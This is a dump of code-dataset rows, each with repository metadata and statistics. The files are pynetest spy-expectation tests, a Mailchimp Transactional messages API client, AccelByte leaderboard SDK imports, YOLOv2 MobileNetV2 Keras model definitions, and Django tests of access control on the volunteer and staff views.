] | 4
|
2018-08-10T20:05:10.000Z
|
2019-07-24T15:29:32.000Z
|
tests/test_doubles/test_doubles_expectations_test.py
|
Avvir/pyne
|
864885a8fb632b72c00af164f150b1daa38a346f
|
[
"MIT"
] | 6
|
2018-09-25T20:15:51.000Z
|
2021-12-22T17:09:52.000Z
|
tests/test_doubles/test_doubles_expectations_test.py
|
Avvir/pyne
|
864885a8fb632b72c00af164f150b1daa38a346f
|
[
"MIT"
] | null | null | null |
from pynetest.expectations import expect
from pynetest.test_doubles.spy import Spy
from pynetest.test_doubles.stub import spy_on
from tests.test_helpers.expectation_helpers import expect_expectation_to_fail_with_message
from tests.test_helpers.some_class import SomeClass
from tests.test_helpers.temporary_class import TemporaryClass
# Tests for pyne's spy expectations (was_called / was_called_with) against
# three subject kinds: a bare Spy, a spied-on instance method, and a spied-on
# static method.
# --- was_called_with: passing cases ---
def test__was_called_with__can_pass():
spy = Spy()
spy("some-positional-argument", ["some-array-content"])
expect(spy).was_called_with("some-positional-argument", ["some-array-content"])
def test__for_an_instance_method__was_called_with__can_pass():
some_instance = SomeClass()
spy_on(some_instance.some_method)
some_instance.some_method("some-positional-argument", ["some-array-content"])
expect(some_instance.some_method).was_called_with("some-positional-argument", ["some-array-content"])
def test__for_a_static_method__was_called_with__can_pass():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
SomeTemporaryClass.some_static_method("some-positional-argument", ["some-array-content"])
expect(SomeTemporaryClass.some_static_method).was_called_with("some-positional-argument", ["some-array-content"])
# --- was_called_with: failure messages when the spy was never called ---
def test__was_called_with__when_there_were_no_calls__fails_with_a_message():
spy = Spy()
expect_expectation_to_fail_with_message(
lambda: expect(spy).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <Spy#__call__> was called with <('some-positional-argument', ['some-array-content'])> but it was never called"""
)
def test__for_an_instance_method__was_called_with__when_there_were_no_calls__fails_with_a_message():
some_instance = SomeClass()
spy_on(some_instance.some_method)
expect_expectation_to_fail_with_message(
lambda: expect(some_instance.some_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeClass#some_method> was called with <('some-positional-argument', ['some-array-content'])> but it was never called"""
)
def test__for_a_static_method__was_called_with__when_there_were_no_calls__fails_with_a_message():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
expect_expectation_to_fail_with_message(
lambda: expect(SomeTemporaryClass.some_static_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeTemporaryClass::some_static_method> was called with <('some-positional-argument', ['some-array-content'])> but it was never called"""
)
# --- was_called_with: failure messages when called with wrong arguments ---
# Note: the wrong call passes the string "some-array-content" where the
# expectation wants the list ["some-array-content"].
def test__was_called_with__when_the_method_was_called_with_the_wrong_parameters__fails_with_a_message():
spy = Spy()
spy("some-positional-argument", "some-array-content")
expect_expectation_to_fail_with_message(
lambda: expect(spy).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <Spy#__call__> was called with <('some-positional-argument', ['some-array-content'])> but it was called with <('some-positional-argument', 'some-array-content')>"""
)
def test__for_an_instance_method__was_called_with__when_the_method_was_called_with_the_wrong_parameters__fails_with_a_message():
some_instance = SomeClass()
spy_on(some_instance.some_method)
some_instance.some_method("some-positional-argument", "some-array-content")
expect_expectation_to_fail_with_message(
lambda: expect(some_instance.some_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeClass#some_method> was called with <('some-positional-argument', ['some-array-content'])> but it was called with <('some-positional-argument', 'some-array-content')>"""
)
def test__for_a_static_method__was_called_with__when_the_method_was_called_with_the_wrong_parameters__fails_with_a_message():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
SomeTemporaryClass.some_static_method("some-positional-argument", "some-array-content")
expect_expectation_to_fail_with_message(
lambda: expect(SomeTemporaryClass.some_static_method).was_called_with("some-positional-argument", ["some-array-content"]),
"""Expected that <SomeTemporaryClass::some_static_method> was called with <('some-positional-argument', ['some-array-content'])> but it was called with <('some-positional-argument', 'some-array-content')>"""
)
# --- was_called: passing cases and failure messages ---
def test__was_called__can_pass():
spy = Spy()
spy()
expect(spy).was_called()
def test__was_called__when_the_subject_is_not_a_spy__fails_with_message():
def some_non_spy():
pass
some_non_spy()
expect_expectation_to_fail_with_message(
lambda: expect(some_non_spy).was_called(),
"""Expected that <tests.test_doubles.test_doubles_expectations_test.some_non_spy> was called but its calls were not tracked. Hint: use stub() to track its calls"""
)
def test__for_an_instance_method__was_called__can_pass():
some_instance = SomeClass()
spy_on(some_instance.some_method)
some_instance.some_method()
expect(some_instance.some_method).was_called()
def test__for_a_static_method__was_called__can_pass():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
SomeTemporaryClass.some_static_method()
expect(SomeTemporaryClass.some_static_method).was_called()
def test__was_called__when_there_were_no_calls__fails_with_a_message():
spy = Spy()
expect_expectation_to_fail_with_message(
lambda: expect(spy).was_called(),
"Expected that <Spy#__call__> was called but it was never called"
)
def test__for_an_instance_method__was_called__when_there_were_no_calls__fails_with_a_message():
some_instance = SomeClass()
spy_on(some_instance.some_method)
expect_expectation_to_fail_with_message(
lambda: expect(some_instance.some_method).was_called(),
"Expected that <SomeClass#some_method> was called but it was never called"
)
def test__for_a_static_method__was_called__when_there_were_no_calls__fails_with_a_message():
with TemporaryClass() as SomeTemporaryClass:
spy_on(SomeTemporaryClass.some_static_method, on=SomeTemporaryClass)
expect_expectation_to_fail_with_message(
lambda: expect(SomeTemporaryClass.some_static_method).was_called(),
"Expected that <SomeTemporaryClass::some_static_method> was called but it was never called"
)
| 43.188679
| 223
| 0.759138
| 887
| 6,867
| 5.384442
| 0.072153
| 0.090452
| 0.081658
| 0.130653
| 0.913526
| 0.894891
| 0.883794
| 0.854271
| 0.830193
| 0.811139
| 0
| 0
| 0.142129
| 6,867
| 158
| 224
| 43.462025
| 0.810728
| 0
| 0
| 0.418367
| 0
| 0
| 0.14972
| 0.074158
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173469
| false
| 0.071429
| 0.061224
| 0
| 0.234694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
63bdbc45a2f8bde7d5c0b0812de684ad21efa5a0
| 15,675
|
py
|
Python
|
mailchimp_transactional/api/messages_api.py
|
singular-labs/mailchimp-transactional-python
|
310f2970596b30a9527ad0c45d0c977c827cd3ba
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_transactional/api/messages_api.py
|
singular-labs/mailchimp-transactional-python
|
310f2970596b30a9527ad0c45d0c977c827cd3ba
|
[
"Apache-2.0"
] | null | null | null |
mailchimp_transactional/api/messages_api.py
|
singular-labs/mailchimp-transactional-python
|
310f2970596b30a9527ad0c45d0c977c827cd3ba
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Mailchimp Transactional API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0.47
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from mailchimp_transactional.api_client import ApiClient
class MessagesApi(object):
    """Client for the Mailchimp Transactional ``/messages/*`` endpoints.

    NOTE: Originally produced by the swagger code generator
    (https://github.com/swagger-api/swagger-codegen); refactored to share
    the common request-building logic in a single helper and to fix two
    defects in the generated code:

    * every public method used a mutable default argument (``body = {}``)
      that is shared across all calls of that method, and
    * the API key was written directly into the caller's dict
      (``params['body']['key'] = ...``), mutating the caller's payload and
      poisoning the shared default with a stale ``'key'`` entry.

    Each endpoint keeps the two-layer shape of the generated client: a thin
    wrapper (e.g. ``send``) plus a ``*_with_http_info`` method, both public.
    """

    def __init__(self, api_key='', api_client = None):
        # The key is injected into every request body; the client defaults
        # to a fresh ApiClient when none is supplied.
        self.api_key = api_key
        if api_client:
            self.api_client = api_client
        else:
            self.api_client = ApiClient()

    def _call(self, method_name, path, response_type, body, kwargs):
        """POST *body* (plus the API key) to *path* and return the response.

        :param method_name: public method name, used only in error messages.
        :param path: endpoint path, e.g. ``'/messages/send'``.
        :param response_type: swagger response type for deserialization.
        :param body: request payload dict, or None/empty for no payload.
        :param kwargs: leftover keyword arguments; any entry is an error.
        :raises TypeError: if an unexpected keyword argument was supplied.
        """
        for key in kwargs:
            # Mirrors the generated client's rejection of unknown kwargs.
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method %s" % (key, method_name)
            )
        # Copy before injecting the key so neither the caller's dict nor a
        # shared default is ever mutated.
        body_params = dict(body) if body else {}
        body_params['key'] = self.api_key
        return self.api_client.call_api(
            path, 'POST',
            body=body_params,
            response_type=response_type)

    def cancel_scheduled(self, body=None, **kwargs):
        """Cancel scheduled email: cancels a scheduled email."""
        return self.cancel_scheduled_with_http_info(body, **kwargs)

    def cancel_scheduled_with_http_info(self, body, **kwargs):
        """Cancel scheduled email: cancels a scheduled email."""
        return self._call('cancel_scheduled', '/messages/cancel-scheduled',
                          'list[InlineResponse20035]', body, kwargs)

    def content(self, body=None, **kwargs):
        """Get message content: the full content of a recently sent message."""
        return self.content_with_http_info(body, **kwargs)

    def content_with_http_info(self, body, **kwargs):
        """Get message content: the full content of a recently sent message."""
        return self._call('content', '/messages/content',
                          'InlineResponse20033', body, kwargs)

    def info(self, body=None, **kwargs):
        """Get message info for a single recently sent message."""
        return self.info_with_http_info(body, **kwargs)

    def info_with_http_info(self, body, **kwargs):
        """Get message info for a single recently sent message."""
        return self._call('info', '/messages/info',
                          'InlineResponse20032', body, kwargs)

    def list_scheduled(self, body=None, **kwargs):
        """List scheduled emails: queries your scheduled emails."""
        return self.list_scheduled_with_http_info(body, **kwargs)

    def list_scheduled_with_http_info(self, body, **kwargs):
        """List scheduled emails: queries your scheduled emails."""
        return self._call('list_scheduled', '/messages/list-scheduled',
                          'list[InlineResponse20035]', body, kwargs)

    def parse(self, body=None, **kwargs):
        """Parse the full MIME document for an email message into its pieces."""
        return self.parse_with_http_info(body, **kwargs)

    def parse_with_http_info(self, body, **kwargs):
        """Parse the full MIME document for an email message into its pieces."""
        return self._call('parse', '/messages/parse',
                          'InlineResponse20034', body, kwargs)

    def reschedule(self, body=None, **kwargs):
        """Reschedule email: reschedules a scheduled email."""
        return self.reschedule_with_http_info(body, **kwargs)

    def reschedule_with_http_info(self, body, **kwargs):
        """Reschedule email: reschedules a scheduled email."""
        return self._call('reschedule', '/messages/reschedule',
                          'list[InlineResponse20035]', body, kwargs)

    def search(self, body=None, **kwargs):
        """Search messages by date.

        Search recently sent messages, optionally narrowed by date range,
        tags, senders, and API keys.  Defaults to the last 7 days; the
        upstream API rate-limits this to 20 calls per minute.
        """
        return self.search_with_http_info(body, **kwargs)

    def search_with_http_info(self, body, **kwargs):
        """Search messages by date (see :meth:`search`)."""
        return self._call('search', '/messages/search',
                          'list[InlineResponse20030]', body, kwargs)

    def search_time_series(self, body=None, **kwargs):
        """Search messages by hour, returning aggregated hourly stats."""
        return self.search_time_series_with_http_info(body, **kwargs)

    def search_time_series_with_http_info(self, body, **kwargs):
        """Search messages by hour, returning aggregated hourly stats."""
        return self._call('search_time_series', '/messages/search-time-series',
                          'list[InlineResponse20031]', body, kwargs)

    def send(self, body=None, **kwargs):
        """Send a new transactional message through the Transactional API."""
        return self.send_with_http_info(body, **kwargs)

    def send_with_http_info(self, body, **kwargs):
        """Send a new transactional message through the Transactional API."""
        return self._call('send', '/messages/send',
                          'list[InlineResponse20028]', body, kwargs)

    def send_raw(self, body=None, **kwargs):
        """Send a raw MIME document exactly as if sent via the SMTP servers."""
        return self.send_raw_with_http_info(body, **kwargs)

    def send_raw_with_http_info(self, body, **kwargs):
        """Send a raw MIME document exactly as if sent via the SMTP servers."""
        return self._call('send_raw', '/messages/send-raw',
                          'object', body, kwargs)

    def send_template(self, body=None, **kwargs):
        """Send a new transactional message using a stored template."""
        return self.send_template_with_http_info(body, **kwargs)

    def send_template_with_http_info(self, body, **kwargs):
        """Send a new transactional message using a stored template."""
        return self._call('send_template', '/messages/send-template',
                          'list[InlineResponse20029]', body, kwargs)
| 34.526432
| 423
| 0.572249
| 1,871
| 15,675
| 4.677178
| 0.102084
| 0.091418
| 0.052794
| 0.067878
| 0.886413
| 0.874986
| 0.856245
| 0.82402
| 0.821278
| 0.812364
| 0
| 0.034755
| 0.328166
| 15,675
| 453
| 424
| 34.602649
| 0.796221
| 0.299522
| 0
| 0.664032
| 1
| 0
| 0.143807
| 0.026584
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.01581
| 0
| 0.197628
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
892b052b556348d0f4c75a620017c9e5e580c56a
| 5,638
|
py
|
Python
|
accelbyte_py_sdk/api/leaderboard/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/leaderboard/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/leaderboard/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-leaderboard-service."""
__version__ = "2.15.5"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
from ._leaderboard_configuration import create_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import create_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import create_leaderboard_configuration_public_v1
from ._leaderboard_configuration import create_leaderboard_configuration_public_v1_async
from ._leaderboard_configuration import delete_bulk_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import delete_bulk_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import delete_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import delete_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import get_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import get_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import get_leaderboard_configurations_admin_v1
from ._leaderboard_configuration import get_leaderboard_configurations_admin_v1_async
from ._leaderboard_configuration import get_leaderboard_configurations_public_v1
from ._leaderboard_configuration import get_leaderboard_configurations_public_v1_async
from ._leaderboard_configuration import get_leaderboard_configurations_public_v2
from ._leaderboard_configuration import get_leaderboard_configurations_public_v2_async
from ._leaderboard_configuration import update_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import update_leaderboard_configuration_admin_v1_async
from ._leaderboard_data import admin_get_archived_leaderboard_ranking_data_v1_handler
from ._leaderboard_data import admin_get_archived_leaderboard_ranking_data_v1_handler_async
from ._leaderboard_data import create_archived_leaderboard_ranking_data_v1_handler
from ._leaderboard_data import create_archived_leaderboard_ranking_data_v1_handler_async
from ._leaderboard_data import delete_user_ranking_admin_v1
from ._leaderboard_data import delete_user_ranking_admin_v1_async
from ._leaderboard_data import delete_user_ranking_public_v1
from ._leaderboard_data import delete_user_ranking_public_v1_async
from ._leaderboard_data import delete_user_rankings_admin_v1
from ._leaderboard_data import delete_user_rankings_admin_v1_async
from ._leaderboard_data import get_all_time_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_all_time_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v1
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v2
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v2_async
from ._leaderboard_data import get_archived_leaderboard_ranking_data_v1_handler
from ._leaderboard_data import get_archived_leaderboard_ranking_data_v1_handler_async
from ._leaderboard_data import get_current_month_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_current_month_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_current_month_leaderboard_ranking_public_v1
from ._leaderboard_data import get_current_month_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_current_season_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_current_season_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_current_season_leaderboard_ranking_public_v1
from ._leaderboard_data import get_current_season_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_current_week_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_current_week_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_current_week_leaderboard_ranking_public_v1
from ._leaderboard_data import get_current_week_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_today_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_today_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_today_leaderboard_ranking_public_v1
from ._leaderboard_data import get_today_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_user_ranking_admin_v1
from ._leaderboard_data import get_user_ranking_admin_v1_async
from ._leaderboard_data import get_user_ranking_public_v1
from ._leaderboard_data import get_user_ranking_public_v1_async
from ._leaderboard_data import update_user_point_admin_v1
from ._leaderboard_data import update_user_point_admin_v1_async
from ._user_data import get_user_leaderboard_rankings_admin_v1
from ._user_data import get_user_leaderboard_rankings_admin_v1_async
from ._user_visibility import get_hidden_users_v2
from ._user_visibility import get_hidden_users_v2_async
from ._user_visibility import get_user_visibility_status_v2
from ._user_visibility import get_user_visibility_status_v2_async
from ._user_visibility import set_user_leaderboard_visibility_status_v2
from ._user_visibility import set_user_leaderboard_visibility_status_v2_async
from ._user_visibility import set_user_visibility_status_v2
from ._user_visibility import set_user_visibility_status_v2_async
| 64.068182
| 92
| 0.919652
| 768
| 5,638
| 6.075521
| 0.114583
| 0.186455
| 0.16288
| 0.214316
| 0.926275
| 0.92306
| 0.919846
| 0.917703
| 0.900557
| 0.578654
| 0
| 0.014345
| 0.060305
| 5,638
| 87
| 93
| 64.804598
| 0.866365
| 0.065271
| 0
| 0
| 1
| 0
| 0.006086
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.957746
| 0
| 0.957746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
893b30389a15648b9184604dd7f219b22fc0f23c
| 3,944
|
py
|
Python
|
yolo2/models/yolo2_mobilenetv2.py
|
grifon-239/diploma
|
bdf02f9f5e279516920189da17c256776a9d5b02
|
[
"MIT"
] | 2
|
2021-01-26T23:03:47.000Z
|
2021-05-04T16:11:34.000Z
|
yolo2/models/yolo2_mobilenetv2.py
|
acobo/keras-YOLOv3-model-set
|
6d7f7f2474dda43c112a9e0321447109a446ac69
|
[
"MIT"
] | null | null | null |
yolo2/models/yolo2_mobilenetv2.py
|
acobo/keras-YOLOv3-model-set
|
6d7f7f2474dda43c112a9e0321447109a446ac69
|
[
"MIT"
] | 2
|
2020-07-07T16:30:59.000Z
|
2020-10-05T06:07:22.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v2 MobileNetV2 Model Defined in Keras."""
from tensorflow.keras.layers import MaxPooling2D, Lambda, Concatenate, GlobalAveragePooling2D, Softmax
from tensorflow.keras.models import Model
from tensorflow.keras.applications.mobilenet_v2 import MobileNetV2
from yolo2.models.layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, bottleneck_block, bottleneck_x2_block, space_to_depth_x2, space_to_depth_x2_output_shape
def yolo2_mobilenetv2_body(inputs, num_anchors, num_classes, alpha=1.0):
    """Create YOLO_V2 MobileNetV2 model CNN body in Keras.

    Builds an ImageNet-pretrained MobileNetV2 backbone and attaches the
    YOLOv2 detection head, including the space-to-depth passthrough branch.
    Returns a Keras Model mapping `inputs` to the raw prediction tensor.
    """
    backbone = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)

    # For a 416 x 416 x 3 input: backbone.output is 13 x 13 x 1280 and
    # block_13_expand_relu (layers[119]) is 26 x 26 x (576*alpha).
    head = DarknetConv2D_BN_Leaky(1280, (3, 3))(backbone.output)
    head = DarknetConv2D_BN_Leaky(1280, (3, 3))(head)

    # Passthrough branch: compress the mid-level feature map, then reshape
    # 26x26 -> 13x13 via space_to_depth so it can be concatenated with head.
    passthrough = backbone.layers[119].output  # block_13_expand_relu
    passthrough = DarknetConv2D_BN_Leaky(int(64 * alpha), (1, 1))(passthrough)
    # TODO: Allow Keras Lambda to use func arguments for output_shape?
    passthrough = Lambda(
        space_to_depth_x2,
        output_shape=space_to_depth_x2_output_shape,
        name='space_to_depth')(passthrough)

    merged = Concatenate()([passthrough, head])
    merged = DarknetConv2D_BN_Leaky(1280, (3, 3))(merged)
    predictions = DarknetConv2D(num_anchors * (num_classes + 5), (1, 1), name='predict_conv')(merged)
    return Model(inputs, predictions)
def yolo2lite_mobilenetv2_body(inputs, num_anchors, num_classes, alpha=1.0):
    """Create YOLO_V2 Lite MobileNetV2 model CNN body in Keras.

    Same topology as `yolo2_mobilenetv2_body`, but the 3x3 head convolutions
    use depthwise-separable blocks to reduce parameters and compute.
    """
    backbone = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)

    # For a 416 x 416 x 3 input: backbone.output is 13 x 13 x 1280 and
    # block_13_expand_relu (layers[119]) is 26 x 26 x (576*alpha).
    head = Depthwise_Separable_Conv2D_BN_Leaky(1280, (3, 3))(backbone.output)
    head = Depthwise_Separable_Conv2D_BN_Leaky(1280, (3, 3))(head)

    # Passthrough branch over the mid-level feature map.
    passthrough = backbone.layers[119].output  # block_13_expand_relu
    passthrough = DarknetConv2D_BN_Leaky(int(64 * alpha), (1, 1))(passthrough)
    # TODO: Allow Keras Lambda to use func arguments for output_shape?
    passthrough = Lambda(
        space_to_depth_x2,
        output_shape=space_to_depth_x2_output_shape,
        name='space_to_depth')(passthrough)

    merged = Concatenate()([passthrough, head])
    merged = Depthwise_Separable_Conv2D_BN_Leaky(1280, (3, 3))(merged)
    predictions = DarknetConv2D(num_anchors * (num_classes + 5), (1, 1), name='predict_conv')(merged)
    return Model(inputs, predictions)
def tiny_yolo2_mobilenetv2_body(inputs, num_anchors, num_classes):
    """Create Tiny YOLO_V2 MobileNetV2 model CNN body in Keras.

    Minimal head: one 3x3 conv block plus the 1x1 prediction conv directly
    on the backbone output (13 x 13 x 1280 for a 416 x 416 x 3 input).
    No passthrough branch.
    """
    backbone = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=1.0)
    features = DarknetConv2D_BN_Leaky(1280, (3, 3))(backbone.output)
    predictions = DarknetConv2D(num_anchors * (num_classes + 5), (1, 1), name='predict_conv')(features)
    return Model(inputs, predictions)
def tiny_yolo2lite_mobilenetv2_body(inputs, num_anchors, num_classes):
    """Create Tiny YOLO_V2 Lite MobileNetV2 model CNN body in Keras.

    Same as `tiny_yolo2_mobilenetv2_body` but the 3x3 head conv is a
    depthwise-separable block.
    """
    backbone = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=1.0)
    features = Depthwise_Separable_Conv2D_BN_Leaky(1280, (3, 3))(backbone.output)
    predictions = DarknetConv2D(num_anchors * (num_classes + 5), (1, 1), name='predict_conv')(features)
    return Model(inputs, predictions)
| 42.408602
| 205
| 0.721602
| 568
| 3,944
| 4.741197
| 0.158451
| 0.031192
| 0.035648
| 0.059413
| 0.861493
| 0.849981
| 0.835871
| 0.835871
| 0.78834
| 0.765689
| 0
| 0.082799
| 0.170132
| 3,944
| 92
| 206
| 42.869565
| 0.739994
| 0.22997
| 0
| 0.73913
| 0
| 0
| 0.036048
| 0
| 0
| 0
| 0
| 0.01087
| 0
| 1
| 0.086957
| false
| 0
| 0.086957
| 0
| 0.26087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
894de622d7ad1a7530460e77d6537e12e2b358bc
| 4,390
|
py
|
Python
|
accounts/tests/test_user_views.py
|
Fabrice-64/advocacy_project
|
33eb8b71e057ea197be578020436defb015fa000
|
[
"MIT"
] | null | null | null |
accounts/tests/test_user_views.py
|
Fabrice-64/advocacy_project
|
33eb8b71e057ea197be578020436defb015fa000
|
[
"MIT"
] | null | null | null |
accounts/tests/test_user_views.py
|
Fabrice-64/advocacy_project
|
33eb8b71e057ea197be578020436defb015fa000
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.urls import reverse_lazy
from accounts.models import CustomUser, Volunteer
class VolunteerListViewTest(TestCase):
    """Access-control tests for the volunteer list view."""

    def setUp(self):
        self.url = reverse_lazy('volunteer_list')
        self.user1 = CustomUser.objects.create(
            username="test_user", password="pwd", is_active=True)
        self.response = self.client.get(self.url)

    def test_volunteer_list_view_not_authorized(self):
        """Without login, the list view redirects to the login page."""
        self.assertEqual(self.response.status_code, 302)
        login_redirect = '/accounts/login/?next=/accounts/volunteer/list/'
        self.assertRedirects(self.response, login_redirect)

    def test_volunteer_list_view_authorized(self):
        """A user granted view_volunteer can load the page content."""
        view_perm = Permission.objects.get(codename="view_volunteer")
        self.user1.user_permissions.add(view_perm)
        self.client.force_login(self.user1)
        self.response = self.client.get(self.url)
        self.assertEqual(self.response.status_code, 200)
        self.assertContains(self.response, "Bénévoles")
class VolunteerDetailViewTest(TestCase):
    """Access-control tests for the volunteer detail view."""

    def setUp(self):
        self.user1 = CustomUser.objects.create(
            username="test_user", password="pwd",
            is_active=True, status_type="MANAGER")
        self.volunteer = Volunteer.objects.create(
            username="test_user2", password="pwd",
            is_active=True, status_type="VOLUNTEER")

    def test_volunteer_detail_view_not_authorized(self):
        """Without the permission the detail view redirects (302)."""
        view_perm = Permission.objects.get(codename="view_volunteer")
        self.user1.user_permissions.remove(view_perm)
        self.response = self.client.get(self.volunteer.get_absolute_url())
        self.assertEqual(self.response.status_code, 302)

    def test_volunteer_detail_view_authorized(self):
        """A logged-in user holding view_volunteer sees the detail page."""
        view_perm = Permission.objects.get(codename="view_volunteer")
        self.user1.user_permissions.add(view_perm)
        self.client.force_login(self.user1)
        self.response = self.client.get(self.volunteer.get_absolute_url())
        self.assertEqual(self.response.status_code, 200)
        self.assertContains(self.response, "volunteer-details")
class StaffListViewTest(TestCase):
    """Access-control tests for the staff list view."""

    def setUp(self):
        self.url = reverse_lazy('staff_list')
        self.user1 = CustomUser.objects.create(
            username="test_user",
            password="pwd", is_active=True)
        self.response = self.client.get(self.url)

    def test_staff_list_view_not_authorized(self):
        """Without login, the staff list redirects to the login page."""
        self.assertEqual(self.response.status_code, 302)
        login_redirect = '/accounts/login/?next=/accounts/staff/list/'
        self.assertRedirects(self.response, login_redirect)

    def test_staff_list_view_authorized(self):
        """A user granted view_employee can load the page content."""
        view_perm = Permission.objects.get(codename="view_employee")
        self.user1.user_permissions.add(view_perm)
        self.client.force_login(self.user1)
        self.response = self.client.get(self.url)
        self.assertEqual(self.response.status_code, 200)
        self.assertContains(self.response, "Membres du Personnel")
class StaffDetailViewTest(TestCase):
    """Access-control tests for the staff (employee) detail view."""

    def setUp(self):
        self.user1 = CustomUser.objects.create(
            username="test_user",
            password="pwd", is_active=True,
            status_type="MANAGER")
        self.employee = CustomUser.objects.create(
            username="test_user2",
            password="pwd", is_active=True,
            status_type="EMPLOYEE")

    def test_staff_detail_view_not_authorized(self):
        """Without the permission the detail view redirects (302)."""
        view_perm = Permission.objects.get(codename="view_employee")
        self.user1.user_permissions.remove(view_perm)
        self.response = self.client.get(
            self.employee.get_absolute_url())
        self.assertEqual(self.response.status_code, 302)

    def test_staff_detail_view_authorized(self):
        """A logged-in user holding view_employee sees the detail page."""
        view_perm = Permission.objects.get(codename="view_employee")
        self.user1.user_permissions.add(view_perm)
        self.client.force_login(self.user1)
        self.response = self.client.get(
            self.employee.get_absolute_url())
        self.assertEqual(self.response.status_code, 200)
        self.assertContains(self.response, "employee-details")
| 39.909091
| 100
| 0.689977
| 521
| 4,390
| 5.639155
| 0.142035
| 0.089857
| 0.043567
| 0.059905
| 0.854663
| 0.822668
| 0.822668
| 0.822668
| 0.796801
| 0.796801
| 0
| 0.011478
| 0.20615
| 4,390
| 109
